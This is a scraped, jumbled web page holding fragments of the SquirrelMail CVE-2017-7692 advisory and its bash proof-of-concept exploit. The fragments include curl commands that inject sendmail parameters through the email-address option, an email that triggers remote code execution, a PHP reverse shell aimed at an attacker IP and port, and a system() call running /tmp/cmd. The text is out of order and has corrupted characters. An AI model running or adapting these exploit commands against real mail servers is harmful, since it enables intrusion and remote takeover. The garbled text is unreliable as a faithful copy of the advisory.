![]() (sleep 2s & curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid key=$keyid" -d"smtoken=$token" -d"startMessage=1" -d"session=0" -d"subject=poc" -data-urlencode "body=$phprevsh" -d"send=Send" -d"username=$squser" $URL/src/compose.php) &Įcho -e "\n Waiting for shell on $reverse_ip port $reverse_port"Įcho -e "\n The test file should have been written at /tmp/sqpoc"Įcho "There was a problem with sending email" # Send email which triggers the RCE vuln and runs phprevshĮcho -e "\n Sending the email to trigger the vuln" Token="`curl -s -b"SQMSESSID=$sessid key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '' | cut -d'"' -f1 `"Ĭurl -s -b"SQMSESSID=$sessid key=$keyid" -d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" -data-urlencode "new_email_address=$payload" "$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/nullĮcho "Failed to inject sendmail parameters" System(\"/bin/bash /tmp/cmd rm -f /tmp/cmd\") Įcho -e "\n Injecting Sendmail command parameters" Provide a malicious sendmail config file which can be uploaded as an attachment to Which will result in /tmp/sqpc file created on disk with email log (-X parameterĬauses sendmail to save the debug/maillog into a file).Īs demonstrated by the PoC exploit below, attacker can also inject -Cparameter to The sendmail program will be called with the following arguments: If attacker sets their email address (Return-Path) in the options -oQ/tmp/ -X/tmp/sqpoc Used by attackers to inject additional parameters. ![]() Unfortunately it does not take into account \t (TAB) character which can be Injection of additional parameters to the sendmail command. SquirrelMail allows authenticated users to control envelopefrom (Return-Path) addressĪs we can see it calls str_replace() to sanitize the user input to prevent $stream = popen(escapeshellcmd($this->sendmail_command), "w") ![]() $this->sendmail_command = "$sendmail_path $this->sendmail_args -f$envelopefrom" save executed command for future reference SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |